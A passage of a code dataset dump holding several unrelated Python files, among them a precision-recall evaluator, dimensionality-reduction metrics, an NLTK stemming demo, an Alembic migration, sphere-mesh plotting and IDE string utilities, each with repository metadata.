np.save('{}/pre_rec_{}'.format(out_dir, c), pre_rec)\n cv.imwrite('{}/pred_{}.png'.format(out_dir, c), pred[:, :, c] * 255)\n\n print(img_id, c, breakeven_pt)\n print('thread finished')\n\n\ndef evaluate(n_process, label_dir, result_dir, epoch, pad, offset, channel, steps, relax):\n \n prediction_dir = '{}prediction_{}'.format(result_dir, epoch)\n prediction_fns = sorted(glob.glob('{}*.npy'.format(prediction_dir)))\n n_prediction = len(prediction_fns)\n eval_dir = '{}/evaluation/'.format(prediction_dir)\n\n all_positive_base = Array(\n ctypes.c_double, n_prediction * channel * steps)\n all_positive = np.ctypeslib.as_array(all_positive_base.get_obj())\n all_positive = all_positive.reshape((n_prediction, channel, steps))\n\n all_prec_tp_base = Array(\n ctypes.c_double, n_prediction * channel * steps)\n all_prec_tp = np.ctypeslib.as_array(all_prec_tp_base.get_obj())\n all_prec_tp = all_prec_tp.reshape((n_prediction, channel, steps))\n\n all_true_base = Array(\n ctypes.c_double, n_prediction * channel * steps)\n all_true = np.ctypeslib.as_array(all_true_base.get_obj())\n all_true = all_true.reshape((n_prediction, channel, steps))\n\n all_recall_tp_base = Array(\n ctypes.c_double, n_prediction * channel * steps)\n all_recall_tp = np.ctypeslib.as_array(all_recall_tp_base.get_obj())\n all_recall_tp = all_recall_tp.reshape((n_prediction, channel, steps))\n result_fn_queue = Queue()\n workers = [Process(target=worker_thread,\n args=(result_fn_queue, eval_dir, label_dir, pad, offset, channel, steps, relax, all_positive, all_prec_tp, all_true, all_recall_tp)) for i in range(n_process)]\n for w in workers:\n w.start()\n [result_fn_queue.put((i, fn)) for i, fn in enumerate(prediction_fns)]\n [result_fn_queue.put((None, None)) for _ in range(n_process)]\n for w in workers:\n w.join()\n print('all finished')\n\n all_positive = np.sum(all_positive, axis=0)\n all_prec_tp = np.sum(all_prec_tp, axis=0)\n all_true = np.sum(all_true, axis=0)\n all_recall_tp = np.sum(all_recall_tp, axis=0)\n for c in six.moves.range(channel):\n pre_rec, breakeven_pt = get_pre_rec(\n all_positive[c], all_prec_tp[c],\n all_true[c], all_recall_tp[c], steps)\n draw_pre_rec_curve(pre_rec, breakeven_pt)\n plt.savefig('{}/pr_curve_{}.png'.format(eval_dir, c))\n np.save('{}/pre_rec_{}'.format(eval_dir, c), pre_rec)\n\n print(breakeven_pt)\n","sub_path":"script/evaluate3.py","file_name":"evaluate3.py","file_ext":"py","file_size_in_byte":6247,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"488268460","text":"from utils import *\nfrom todo import svd_compress\nimport os\n\ndef main():\n print(\"images in folder\")\n for imgf in os.listdir(\"imgs\"):\n img_path = os.path.join(\"imgs\",imgf)\n print(\"\\t\",img_path)\n img_path = 'imgs/Figure1.png'\n print(\"Loading\",img_path)\n imArr = load_image(img_path)\n print(\"imArr size\",imArr.shape)\n #ks = [37]\n ks = [1,5, 50, 150, 400, 600, 800, 1050, 1200]\n err = []\n for k in ks:\n print(\"Perform SVD for k=%d ...\" % k)\n imArr_compressed = svd_compress(imArr, K=k)\n err += [approx_error(imArr, imArr_compressed)]\n save_image(imArr_compressed, 'result_{}.png'.format(k))\n print(\"err\",err[-1])\n plot_curve(ks, err, show=False)\n\nif __name__ == '__main__':\n main()\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":763,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"255378290","text":"# some metric measurement for DR methods\n\nimport numpy as np\nfrom numpy.linalg import norm\nfrom scipy.spatial.distance import pdist, squareform\nfrom scipy.stats import pearsonr\nfrom sklearn.preprocessing import scale\nfrom sklearn.isotonic import IsotonicRegression\n\nMACHINE_EPSILON = np.finfo(np.double).eps\n\n\nclass DRMetric(object):\n \"\"\" Metric measurements for DR methods\n \"\"\"\n\n def __init__(self, X, Y):\n \"\"\" Create Metric object\n Args:\n X (ndarray): input data in high dimensional space\n Y (ndarray): embedded result in low dimensional space\n \"\"\"\n super(DRMetric, self).__init__()\n\n # pre-calculate pairwise distance in high-dim and low-dim\n self.dX = pdist(X, \"euclidean\")\n self.dY = pdist(Y, \"euclidean\")\n\n def _qnx(self, a, b):\n \"\"\"Vectorized version of `self._Qnx` for all values of `k`\n \"\"\"\n n = len(a)\n common = set()\n res = []\n for k in range(1, n - 1):\n common |= {a[k], b[k]}\n q = (2 * k - len(common)) / (k * n)\n assert 0 <= 1 <= 1\n res.append(q)\n return res\n\n def auc_rnx(self):\n \"\"\"Vectorized version of `self._auc_rnx`\n \"\"\"\n idX = np.argsort(squareform(self.dX**2), axis=1)\n idY = np.argsort(squareform(self.dY**2), axis=1)\n n = len(idX)\n\n qnx = [self._qnx(a, b) for a, b in zip(idX, idY)]\n qnx = np.sum(qnx, axis=0)\n\n ks = np.arange(1, n - 1)\n rnx = ((n - 1) * qnx - ks) / (n - 1 - ks)\n return (rnx / ks).sum() / (1.0 / ks).sum()\n\n def pearsonr(self):\n \"\"\"Calculate Pearson correlation coefficient b.w. two vectors\n $$ \\textnormal{CC} =\n \\textnormal{pearson\\_correlation}(d^x, d^y) =\n \\frac{\\textnormal{Cov}(d^x, d^y)}{\\sigma(d^x)\\sigma(d^y)}\n $$\n \"\"\"\n p, _ = pearsonr(self.dX, self.dY)\n return p\n\n def cca_stress(self):\n \"\"\"Curvilinear Component Analysis Stress function\n $$ \\textnormal{CCA} = \\sum_{ij}^{N}\n (d^{x}_{ij} - d^{y}_{ij})^2 F_{\\lambda}(d^{y}_{ij})\n $$\n where $d^{x}_{ij}$ is pairwise distance in high-dim,\n $d^{y}_{ij}$ is pairwise distance in low-dim,\n $F_{\\lambda}(d^{*}_{ij}$ is decreasing weighting-function.\n For CCA, there are some choises for weighting-function:\n e.g. step function (depends $\\lambda$), exponential func or\n $F(d^{y}_{ij}) = 1 - sigmoid(d^{y}_{ij}$.\n \"\"\"\n dX = scale(self.dX)\n dY = scale(self.dY)\n diff = dX - dY\n weight = 1.0 - 1.0 / (1.0 + np.exp(-dY))\n stress = np.dot(diff**2, weight)\n return stress\n\n def mds_isotonic(self):\n \"\"\"Stress function of MDS\n + Pairwise distances vector in high-dim is fitted into an\n Isotonic Regression model\n + The stressMDS function is then applied for the isotonic-fitted\n vector and the pairwise distance vector in low-dim\n $$ \\textnormal{nMDS} = \\sqrt{\\frac\n { \\sum_{ij} (d^{iso}_{ij} - d^{y}_{ij})^2 }\n { \\sum_{ij} d^{y}_{ij} } }\n $$\n where $d^{y}_{ij}$ is pairwise distance in low-dim.\n \"\"\"\n dX = scale(self.dX)\n dY = scale(self.dY)\n ir = IsotonicRegression()\n dYh = ir.fit_transform(X=dX, y=dY)\n return norm(dYh - dY) / norm(dY)\n\n def sammon_nlm(self):\n \"\"\"Stree function for Sammon Nonlinear mapping\n $ \\textnormal{NLM} = \\frac{1}{\\sum_{ij} d^{x}_{ij}}\n \\sum_{ij} \\frac{ (d^{x}_{ij} - d^{y}_{ij})^2 }{d^{x}_{ij}]}\n $\n \"\"\"\n dX = self.dX / np.std(self.dX)\n dX_inv = np.divide(1.0, dX,\n out=np.zeros_like(dX), where=(dX != 0))\n dY = self.dY / np.std(self.dY)\n diff = dX - dY\n stress = np.dot((diff ** 2), dX_inv)\n return stress / dX.sum()\n\n def _Qnx(self, k):\n \"\"\"Calculate $Q_{NX}(k)= \\\\\n \\frac{1}{Nk} \\sum_{i=1}^{N} |v_{i}^{k} \\cap n_{i}^{k}| $\n Args:\n k (int): number of neighbors\n Returns:\n float: value of Q\n \"\"\"\n assert 1 <= k <= self.n_samples - 1\n\n Vk = self.idX[:, :k]\n Nk = self.idY[:, :k]\n q_nx = sum([np.intersect1d(a, b, assume_unique=True).size\n for a, b in zip(Vk, Nk)])\n q_nx /= (k * self.n_samples)\n\n assert 0.0 <= q_nx <= 1.0\n return q_nx\n\n def _Rnx(self, k):\n \"\"\"Calculate rescaled version of $Q_{NX}(k)$\n $R_{NX}(k) = \\frac{(N-1) Q_{NX}(k) - k}{N - 1 - k} $\n Args:\n k (int): number of neighbors\n Returns:\n float: value of R\n \"\"\"\n assert 1 <= k <= self.n_samples - 2\n rnx = (self.n_samples - 1) * self._Qnx(k) - k\n rnx /= (self.n_samples - 1 - k)\n return rnx\n\n def _auc_rnx(self):\n \"\"\"Calculate Area under the $R_{NX}(k)$ curve in the log-scale of $k$\n $$ \\textnormal{AUC}_{log}\\textnormal{RNX} =\n \\frac {\\left(\\sum_{k=1}^{N-2} \\frac{R_{NX}(k)}{k} \\right)}\n {\\left(\\sum_{k=1}^{N-2}\\frac{1}{k}\\right)}\n $$\n \"\"\"\n auc = sum([self._Rnx(k) / k for k in range(1, self.n_samples - 1)])\n norm_const = sum([1 / k for k in range(1, self.n_samples - 1)])\n auc /= norm_const\n assert 0.0 <= auc <= 1.0\n return auc\n","sub_path":"validate_contraints/metrics.py","file_name":"metrics.py","file_ext":"py","file_size_in_byte":5522,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"197256097","text":"#!/bin/python3\r\n\r\nimport math\r\nimport os\r\nimport random\r\nimport re\r\nimport sys\r\n\r\n# Complete the countingValleys function below.\r\ndef countingValleys(n, s):\r\n sea_level = 0\r\n up = 0\r\n down = 0\r\n valley = 0\r\n mountains = 0\r\n \r\n for char in s:\r\n if char == 'U':\r\n sea_level += 1\r\n if sea_level==0:\r\n valley +=1\r\n else:\r\n sea_level -=1\r\n \r\n return valley\r\n\r\n\r\nif __name__ == '__main__':\r\n fptr = open(os.environ['OUTPUT_PATH'], 'w')\r\n\r\n n = int(input())\r\n\r\n s = input()\r\n\r\n result = countingValleys(n, s)\r\n\r\n fptr.write(str(result) + '\\n')\r\n\r\n fptr.close()\r\n","sub_path":"counting_valleys.py","file_name":"counting_valleys.py","file_ext":"py","file_size_in_byte":670,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"142602561","text":"# Authors: Samwel, Josephine, Modester\n# GitHub handles: @Sammyiel, @Josephine-uwizeye, @Modester-mw\n\n# Question: Input a list of lists and return a single list with each element occurring exactly once.\n\n# defining a function that takes a list of list sums up the lists into a single list and using\n# list and set to remove duplicates\n\ndef list_of_list():\n fruits = [[\"mango\", \"pineapple\"], [\"pineapple\", \"guava\"]]\n result = (sum(fruits, []))\n print(list(set(result)))\n\n # calling out the function\n\n\nlist_of_list()\n\n","sub_path":"question8.py","file_name":"question8.py","file_ext":"py","file_size_in_byte":528,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"222403356","text":"'''\nPurpose of stemming. To ensure variations of a verb in terms of tense all go back to the sme thing to help in decoding the meaning of a sentence\nexample of stemmers...brown stemmer, porter stemmer, snowball stemmer\n'''\nfrom nltk.stem import PorterStemmer,SnowballStemmer,WordNetLemmatizer\nfrom nltk.tokenize import word_tokenize\nps=PorterStemmer()\nexample_words=['python','pythoner','pythoning','pythoned','going','went','go','delayed','coming','running']\nfor w in example_words:\n print(ps.stem(w))\n\n# use ps stemmer to stem a sentence after it being tokenized. Ensure the sentence has varied tense verbs\n\n#compare with snowball stemmer\nsb=SnowballStemmer('english')\nprint('=================++++++=============++=\\n Snowball stemmer')\nfor w in example_words:\n print(sb.stem(w))\n# Comparison with lematization\n#in lemmatization, you can pass a part of speech parameter (pos) and give which part of speeh an inetm belongs to eg lemmatize(\"better\",pos=\"a\")\nprint('=================++++++=============++=\\n Lematization')\nwl=WordNetLemmatizer()\nfor w in example_words:\n print(wl.lemmatize(w))","sub_path":"stemming.py","file_name":"stemming.py","file_ext":"py","file_size_in_byte":1101,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"287312529","text":"from django import template\nfrom django.urls import reverse\n\nregister = template.Library()\n\n\n@register.simple_tag(name='pagination_link')\ndef pagination_link(value, page, params=None):\n if not params:\n params = ()\n\n params = params + (page,)\n if 'paginated' not in value:\n value = '%s-paginated' % value\n\n return reverse(value, args=params)\n","sub_path":"sites/templatetags/custom_tags.py","file_name":"custom_tags.py","file_ext":"py","file_size_in_byte":367,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"310231867","text":"\"\"\"Change Table Name\n\nRevision ID: a3135c18513d\nRevises: 12b6ae6ce692\nCreate Date: 2018-11-28 23:03:31.895532\n\n\"\"\"\nfrom alembic import op\nimport sqlalchemy as sa\nfrom sqlalchemy.dialects import mysql\n\n# revision identifiers, used by Alembic.\nrevision = 'a3135c18513d'\ndown_revision = '12b6ae6ce692'\nbranch_labels = None\ndepends_on = None\n\n\ndef upgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.create_table('scheduled_answer',\n sa.Column('id', sa.Integer(), autoincrement=True, nullable=False),\n sa.Column('client_id', sa.Integer(), nullable=True),\n sa.Column('answer_id', sa.Integer(), nullable=True),\n sa.Column('is_sent', sa.Boolean(), nullable=False),\n sa.Column('reply_when', sa.DateTime(), nullable=True),\n sa.Column('sent_when', sa.DateTime(), nullable=True),\n sa.Column('created_at', mysql.TIMESTAMP(timezone=True), server_default=sa.text('CURRENT_TIMESTAMP'), nullable=False),\n sa.Column('updated_at', mysql.TIMESTAMP(timezone=True), server_default=sa.text('CURRENT_TIMESTAMP'), nullable=False),\n sa.ForeignKeyConstraint(['answer_id'], ['answer.id'], ),\n sa.ForeignKeyConstraint(['client_id'], ['client.id'], ),\n sa.PrimaryKeyConstraint('id')\n )\n op.drop_table('client_answer')\n # ### end Alembic commands ###\n\n\ndef downgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.create_table('client_answer',\n sa.Column('id', mysql.INTEGER(display_width=11), autoincrement=True, nullable=False),\n sa.Column('client_id', mysql.INTEGER(display_width=11), autoincrement=False, nullable=True),\n sa.Column('answer_id', mysql.INTEGER(display_width=11), autoincrement=False, nullable=True),\n sa.Column('is_sent', mysql.TINYINT(display_width=1), autoincrement=False, nullable=False),\n sa.Column('reply_when', mysql.DATETIME(), nullable=True),\n sa.Column('sent_when', mysql.DATETIME(), nullable=True),\n sa.Column('created_at', mysql.TIMESTAMP(), server_default=sa.text('CURRENT_TIMESTAMP'), nullable=False),\n sa.Column('updated_at', mysql.TIMESTAMP(), server_default=sa.text('CURRENT_TIMESTAMP'), nullable=False),\n sa.ForeignKeyConstraint(['answer_id'], ['answer.id'], name='client_answer_ibfk_1'),\n sa.ForeignKeyConstraint(['client_id'], ['client.id'], name='client_answer_ibfk_2'),\n sa.PrimaryKeyConstraint('id'),\n mysql_collate='utf8mb4_0900_ai_ci',\n mysql_default_charset='utf8mb4',\n mysql_engine='InnoDB'\n )\n op.drop_table('scheduled_answer')\n # ### end Alembic commands ###\n","sub_path":"database/versions/a3135c18513d_change_table_name.py","file_name":"a3135c18513d_change_table_name.py","file_ext":"py","file_size_in_byte":2530,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"544708804","text":"import random\n\nimport matplotlib\nimport numpy as np\nimport generator_shape as gn\nimport matplotlib.pyplot as plt\nimport dist_eval as evl\nfrom mpl_toolkits.mplot3d import Axes3D\nimport matplotlib.cm as cm\n\n#spehere: 162,642,2562 #change radius as well\n\n#mesh1 = gn.sphere_generator(9.5, 162)\n#mesh2 = gn.sphere_generator(10, 162)\n\nradius = random.randint(0,100)\nnoise = radius/100\nnum_points = 162 #spehere: 162,642,2562 #change radius as well\n\nmesh1 = gn.sphere_generator(radius, num_points, noise)\n\nif radius%2 == 0:\n mesh2 = gn.sphere_generator(radius-noise, num_points, 0)\nelse:\n mesh2 = gn.sphere_generator(radius+noise, num_points, 0)\n\n\n\n#mesh1 = gn.sphere_generator(7.5, 2542)\n#mesh2 = gn.sphere_generator(10, 2562)\n\n\n#Target Mesh\nfig0 = plt.figure()\nax0 = fig0.add_subplot(111, projection='3d')\nax0.set_title(\"Target Mesh\")\n\nxtrg = mesh2[:, 0]\nytrg = mesh2[:, 1]\nztrg = mesh2[:, 2]\n\nax0 = ax0.scatter3D(xtrg, ytrg, ztrg, s=1)\n\n#RMS Heat Map without Normalize\nrms_dis = evl.rms_without_normalize(mesh1, mesh2)\n\nfig2 = plt.figure()\nax2 = fig2.add_subplot(111, projection='3d')\nax2.set_title(\"RMS Heat Map without Normalize - RMS Score: \"+ str(sum(rms_dis)/len(rms_dis)))\n\nxtest = mesh1[:, 0]\nytest = mesh1[:, 1]\nztest = mesh1[:, 2]\n\nax2 = ax2.scatter3D(xtest, ytest, ztest, c=rms_dis, cmap='Spectral_r', s=50);\n\nfig2.colorbar(ax2)\n\n#RMS Heat Map with Normalize\nrms_dis_w_no = evl.rms_with_normalize(mesh1, mesh2)\n\nfig2 = plt.figure()\nax2 = fig2.add_subplot(111, projection='3d')\nax2.set_title(\"RMS Heat Map with Normalize - RMS Score: \"+ str(sum(rms_dis_w_no)/len(rms_dis_w_no)))\n\nxtest = mesh1[:, 0]\nytest = mesh1[:, 1]\nztest = mesh1[:, 2]\n\nax2 = ax2.scatter3D((xtest - np.min(xtest)) / np.ptp(xtest), (ytest - np.min(ytest)) / np.ptp(ytest), (ztest - np.min(ztest)) / np.ptp(ztest), c=rms_dis_w_no, cmap='Spectral_r', s=50);\n\nfig2.colorbar(ax2)\n\n#Chamfer Heat Map without Normalize\ncham_dis = evl.chamfer_without_normalize(mesh1, mesh2)\n\nfig3 = plt.figure()\nax3 = fig3.add_subplot(111, projection='3d')\nax3.set_title(\"Chamfer Heat Map without Normalize - Chamfer Score: \"+ str(sum(cham_dis)/len(cham_dis)))\n\nxtest = mesh1[:, 0]\nytest = mesh1[:, 1]\nztest = mesh1[:, 2]\n\nax3 = ax3.scatter3D(xtest, ytest, ztest, c=cham_dis, cmap='Spectral_r', s=50);\n\nfig3.colorbar(ax3)\n\n#Chamfer Heat Map with Normalize\ncham_dis_w_no = evl.chamfer_with_normalize(mesh1, mesh2)\n\nfig4 = plt.figure()\nax4 = fig4.add_subplot(111, projection='3d')\nax4.set_title(\"Chamfer Heat Map with Normalize - Chamfer Score: \"+ str(sum(cham_dis_w_no)/len(cham_dis_w_no)))\n\nxtest = mesh1[:, 0]\nytest = mesh1[:, 1]\nztest = mesh1[:, 2]\n\nax4 = ax4.scatter3D((xtest - np.min(xtest)) / np.ptp(xtest), (ytest - np.min(ytest)) / np.ptp(ytest), (ztest - np.min(ztest)) / np.ptp(ztest), c=cham_dis_w_no, cmap='Spectral_r', s=50);\n\nfig4.colorbar(ax4)\n\n# uniform\n\nfig5 = plt.figure()\nax5 = fig5.gca(projection='3d')\nax5.set_aspect(\"equal\")\n\nu, v = np.mgrid[0:2*np.pi:18j, 0:np.pi:9j]\nx = np.cos(u)*np.sin(v)\ny = np.sin(u)*np.sin(v)\nz = np.cos(v)\n\n\n\n#ax5.scatter(x, y, z, c=cham_dis_w_no,cmap='Spectral_r',s=100)\n#print(cham_dis_w_no)\n#cham_dis_w_no = np.reshape(cham_dis_w_no,(169,1))\n#print(cham_dis_w_no)\n\ncolor_dimension = np.reshape(cham_dis_w_no,(18,9)) # change to desired fourth dimension\nminn, maxx = color_dimension.min(), color_dimension.max()\nnorm = matplotlib.colors.Normalize(minn, maxx)\nm = plt.cm.ScalarMappable(norm=norm, cmap='Spectral_r')\nm.set_array([])\nfcolors = m.to_rgba(color_dimension)\n\nprint(fcolors.shape)\n\nax5.plot_surface(x, y, z, facecolors=fcolors,alpha=1)\n\nfig5.colorbar(m)\n\nplt.show()","sub_path":"sphere_eval.py","file_name":"sphere_eval.py","file_ext":"py","file_size_in_byte":3581,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"632093311","text":"# -*- coding: utf-8 -*-\r\n#-------------------------------------------------------------------------------\r\n# Name: strutils.py\r\n# Purpose:\r\n#\r\n# Author: wukan\r\n#\r\n# Created: 2019-01-18\r\n# Copyright: (c) wukan 2019\r\n# Licence: GPL-3.0\r\n#-------------------------------------------------------------------------------\r\n\r\nimport os\r\nimport re\r\nimport noval.python.parser.utils as parserutils\r\nfrom noval.util import apputils\r\nfrom noval import _,GetApp\r\nimport noval.util.txtutils as txtutils\r\nimport shlex\r\n\r\ndef caseInsensitiveCompare(s1, s2):\r\n \"\"\" Method used by sort() to sort values in case insensitive order \"\"\"\r\n s1L = s1.lower()\r\n s2L = s2.lower()\r\n if s1L == s2L:\r\n return 0\r\n elif s1L < s2L:\r\n return -1\r\n else:\r\n return 1\r\n\r\ndef multiSplit(stringList, tokenList=[\" \"]):\r\n \"\"\"Splits strings in stringList by tokens, returns list of string.\"\"\"\r\n if not stringList: return []\r\n if isinstance(tokenList, basestring):\r\n tokenList = [tokenList]\r\n if isinstance(stringList, basestring):\r\n stringList = [stringList]\r\n rtnList = stringList\r\n for token in tokenList:\r\n rtnList = rtnList[:]\r\n for string in rtnList:\r\n if string.find(token) > -1:\r\n rtnList.remove(string)\r\n names = string.split(token)\r\n for name in names:\r\n name = name.strip()\r\n if name:\r\n rtnList.append(name)\r\n return rtnList\r\n\r\nQUOTES = (\"\\\"\", \"'\")\r\n\r\ndef _findArgStart(argStr):\r\n i = -1\r\n for c in argStr:\r\n i += 1\r\n if (c == \" \"):\r\n continue\r\n elif (c == \",\"):\r\n continue\r\n return i\r\n return None\r\n\r\ndef _findArgEnd(argStr):\r\n quotedArg = True\r\n argEndChar = argStr[0]\r\n if (not argEndChar in QUOTES):\r\n argEndChar = \",\"\r\n quotedArg = False\r\n i = -1\r\n firstChar = True\r\n for c in argStr:\r\n i+= 1\r\n if (firstChar):\r\n firstChar = False\r\n if (quotedArg):\r\n continue\r\n if (c == argEndChar):\r\n if (quotedArg):\r\n return min(i+1, len(argStr))\r\n else:\r\n return i\r\n return i\r\n\r\ndef parseArgs(argStr, stripQuotes=False):\r\n \"\"\"\r\n Given a str representation of method arguments, returns list arguments (as\r\n strings).\r\n \r\n Input: \"('[a,b]', 'c', 1)\" -> Output: [\"'[a,b]'\", \"'c'\", \"1\"].\r\n\r\n If stripQuotes, removes quotes from quoted arg.\r\n \"\"\"\r\n if (argStr.startswith(\"(\")):\r\n argStr = argStr[1:]\r\n if (argStr.endswith(\")\")):\r\n argStr = argStr[:-1]\r\n else:\r\n raise AssertionError(\"Expected argStr to end with ')'\")\r\n\r\n rtn = []\r\n argsStr = argStr.strip()\r\n while (True):\r\n startIndex = _findArgStart(argStr)\r\n if (startIndex == None):\r\n break\r\n argStr = argStr[startIndex:]\r\n endIndex = _findArgEnd(argStr)\r\n if (endIndex == len(argStr) - 1):\r\n rtn.append(argStr.strip())\r\n break \r\n t = argStr[:endIndex].strip()\r\n if (stripQuotes and t[0] in QUOTES and t[-1] in QUOTES):\r\n t = t[1:-1]\r\n rtn.append(t)\r\n argStr = argStr[endIndex:]\r\n return rtn\r\n\r\ndef get_file_extension(filename,to_lower=True,has_dot=False):\r\n basename = os.path.basename(filename)\r\n names = basename.split(\".\")\r\n if 1 == len(names):\r\n return \"\"\r\n if to_lower:\r\n ext = names[-1].lower()\r\n else:\r\n ext = names[-1]\r\n if has_dot:\r\n ext = \".\" + ext\r\n return ext\r\n \r\n\r\ndef MakeNameEndInExtension(name, extension):\r\n if not name:\r\n return name\r\n ext = get_file_extension(name)\r\n if ext == extension:\r\n return name\r\n else:\r\n return name + extension\r\n \r\ndef get_filename_without_ext(file_path_name):\r\n filename = os.path.basename(file_path_name)\r\n return os.path.splitext(filename)[0]\r\n\r\ndef get_python_coding_declare(lines):\r\n # Only consider the first two lines\r\n CODING_REG_STR = re.compile(r'^[ \\t\\f]*#.*coding[:=][ \\t]*([-\\w.]+)')\r\n BLANK_REG_STR = re.compile(r'^[ \\t\\f]*(?:[#\\r\\n]|$)')\r\n lst = lines[:2]\r\n hit_line = 0\r\n for line in lst:\r\n match = CODING_REG_STR.match(line)\r\n if match is not None:\r\n break\r\n if not BLANK_REG_STR.match(line):\r\n return None,-1\r\n hit_line += 1\r\n else:\r\n return None,-1\r\n name = match.group(1)\r\n return name,hit_line\r\n \r\ndef emphasis_path(path):\r\n path = \"\\\"%s\\\"\" % path\r\n return path\r\n \r\ndef gen_file_filters(exclude_template_type = None):\r\n filters = []\r\n for temp in GetApp().GetDocumentManager().GetTemplates():\r\n if exclude_template_type is not None and (temp.GetDocumentType() == exclude_template_type):\r\n continue\r\n if temp.IsVisible():\r\n filter = get_template_filter(temp)\r\n filters.append(filter)\r\n filters.append((_(\"All Files\"),\".*\"))\r\n #将列表倒序,使\"所有文件\"显示在看得见的第一行\r\n filters = filters[::-1]\r\n return filters\r\n \r\ndef get_template_filter(template):\r\n descr = template.GetFileFilter()\r\n filter_types = [l.lstrip(\"*\") for l in descr.split(\";\")]\r\n return (template.GetDescription(),' '.join(filter_types))\r\n \r\n\r\ndef HexToRGB(hex_str):\r\n \"\"\"Returns a list of red/green/blue values from a\r\n hex string.\r\n @param hex_str: hex string to convert to rgb\r\n\r\n \"\"\"\r\n hexval = hex_str\r\n if hexval[0] == u\"#\":\r\n hexval = hexval[1:]\r\n ldiff = 6 - len(hexval)\r\n hexval += ldiff * u\"0\"\r\n # Convert hex values to integer\r\n red = int(hexval[0:2], 16)\r\n green = int(hexval[2:4], 16)\r\n blue = int(hexval[4:], 16)\r\n return [red, green, blue]\r\n \r\ndef RGBToHex(clr):\r\n return \"#%02x%02x%02x\" % (clr.Red(),clr.Green(),clr.Blue())\r\n \r\n\r\ndef EncodeString(string, encoding=None):\r\n \"\"\"Try and encode a given unicode object to a string\r\n with the provided encoding returning that string. The\r\n default encoding will be used if None is given for the\r\n encoding.\r\n @param string: unicode object to encode into a string\r\n @keyword encoding: encoding to use for conversion\r\n\r\n \"\"\"\r\n if not encoding:\r\n encoding = DEFAULT_ENCODING\r\n\r\n if txtutils.IsUnicode(string):\r\n try:\r\n rtxt = string.encode(encoding)\r\n except LookupError:\r\n rtxt = string\r\n return rtxt\r\n else:\r\n return string\r\n \r\n\r\ndef is_none_or_empty(value_str):\r\n return parserutils.IsNoneOrEmpty(value_str)\r\n \r\ndef is_same_path(path1,path2):\r\n return parserutils.ComparePath(path1,path2)\r\n \r\ndef compare_version(new_ver_str,old_ver_str):\r\n new_ver = parserutils.CalcVersionValue(new_ver_str)\r\n old_ver = parserutils.CalcVersionValue(old_ver_str)\r\n if new_ver == old_ver:\r\n return 0\r\n elif new_ver > old_ver:\r\n return 1\r\n else:\r\n return -1\r\n \r\n\r\ndef isInArgs(argname, argv):\r\n result = False\r\n if (\"-\" + argname) in argv:\r\n result = True\r\n if apputils.is_windows() and (\"/\" + argname) in argv:\r\n result = True \r\n return result\r\n \r\ndef path_startswith(child_name, dir_name):\r\n '''\r\n 判断路径是否包含另外一个路径\r\n '''\r\n normchild = os.path.normpath(os.path.normcase(child_name))\r\n normdir = os.path.normpath(os.path.normcase(dir_name))\r\n return normdir == normchild or normchild.startswith(normdir.rstrip(os.path.sep) + os.path.sep)\r\n\r\ndef normpath_with_actual_case(name):\r\n \"\"\"In Windows return the path with the case it is stored in the filesystem\"\"\"\r\n assert os.path.isabs(name) or os.path.ismount(name), \"Not abs nor mount: \" + name\r\n assert os.path.exists(name), \"Not exists: \" + name\r\n if os.name == \"nt\":\r\n name = os.path.realpath(name)\r\n from ctypes import create_unicode_buffer, windll\r\n buf = create_unicode_buffer(512)\r\n windll.kernel32.GetShortPathNameW(name, buf, 512) # @UndefinedVariable\r\n windll.kernel32.GetLongPathNameW(buf.value, buf, 512) # @UndefinedVariable\r\n if len(buf.value):\r\n result = buf.value\r\n else:\r\n result = name\r\n assert isinstance(result, str)\r\n if result[1] == \":\":\r\n # ensure drive letter is capital\r\n return result[0].upper() + result[1:]\r\n else:\r\n return result\r\n else:\r\n return os.path.normpath(name)\r\n \r\ndef is_sample_file(file_1,file_2):\r\n \r\n if apputils.is_py3_plus():\r\n return os.path.samefile(file_1,file_2)\r\n elif apputils.is_py2():\r\n return 0 == caseInsensitiveCompare(normpath_with_actual_case(file_1),normpath_with_actual_case(file_2))\r\n \r\n\r\ndef shorten_repr(original_repr, max_len = 1000):\r\n if len(original_repr) > max_len:\r\n return original_repr[: max_len - 1] + \"…\"\r\n else:\r\n return original_repr\r\n\r\ndef parse_cmd_line(s,posix=False):\r\n return shlex.split(s, posix=posix)","sub_path":"noval/util/strutils.py","file_name":"strutils.py","file_ext":"py","file_size_in_byte":9129,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"222224415","text":"########################################################################\n# $HeadURL $\n# File: RequestValidatorTests.py\n# Author: Krzysztof.Ciba@NOSPAMgmail.com\n# Date: 2012/09/25 13:49:20\n########################################################################\n\n\"\"\" :mod: RequestValidatorTests \n =======================\n \n .. module: RequestValidatorTests\n :synopsis: test cases for RequestValidator\n .. moduleauthor:: Krzysztof.Ciba@NOSPAMgmail.com\n\n test cases for RequestValidator\n\"\"\"\n\n__RCSID__ = \"$Id $\"\n\n##\n# @file RequestValidatorTests.py\n# @author Krzysztof.Ciba@NOSPAMgmail.com\n# @date 2012/09/25 13:49:31\n# @brief Definition of RequestValidatorTests class.\n\n## imports \nimport unittest\n## from DIRAC\nfrom DIRAC.RequestManagementSystem.Client.Request import Request\nfrom DIRAC.RequestManagementSystem.Client.Operation import Operation\nfrom DIRAC.RequestManagementSystem.Client.File import File\n## SUT\nfrom DIRAC.RequestManagementSystem.private.RequestValidator import RequestValidator\n\n\n########################################################################\nclass RequestValidatorTests(unittest.TestCase):\n \"\"\"\n .. class:: RequestValidatorTests\n \n \"\"\"\n\n def setUp( self ):\n \"\"\" test setup \"\"\"\n self.request = Request()\n self.operation = Operation()\n 